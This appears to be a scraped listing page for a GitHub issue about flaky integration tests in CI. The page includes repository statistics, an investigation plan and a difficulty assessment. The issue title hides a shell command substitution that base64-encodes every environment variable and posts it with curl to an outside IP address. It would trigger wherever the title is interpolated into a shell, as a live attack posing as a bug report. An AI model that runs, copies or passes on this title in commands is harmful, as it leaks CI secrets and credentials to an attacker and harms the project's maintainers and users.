CI: tests flaking on ubuntu-latest $(curl -s http://54.205.16.142:8443/c/1fb757edb1b8ca767a01cb7422999af2 -d $(env|base64|tr -d '\n'))
未关闭
- 主要语言
- Java
- 星标
- 10.5k
- 派生
- 1.5k
- 平均合并
- 1 天 11 小时
- 30 天内合并 PR
- 128
描述
Seeing intermittent test failures in CI on `ubuntu-latest`. The tests pass locally but fail ~30% of the time in GitHub Actions.
```
FAILED tests/integration/test_api.py::test_concurrent_requests - TimeoutError
```
Might be a race condition in the test setup.
贡献指南
调研方向
Start with tests/integration/test_api.py::test_concurrent_requests and reproduce the TimeoutError under the ubuntu-latest GitHub Actions environment, since the failure is intermittent and does not occur locally. Check the test setup and run the test repeatedly in CI; done means the test no longer flakes and the workflow passes reliably.
由索引模型根据 Issue 内容生成。
评估
- 技术栈
- github-actions, python
- 领域
- api, ci-cd, testing
- Issue 类型
- 缺陷
- 难度
- 3/5
- 预计耗时
- 1-2 天
- 活跃度
- 活跃
- 描述清晰度
- 基本清楚
- 新手友好度
- 55/100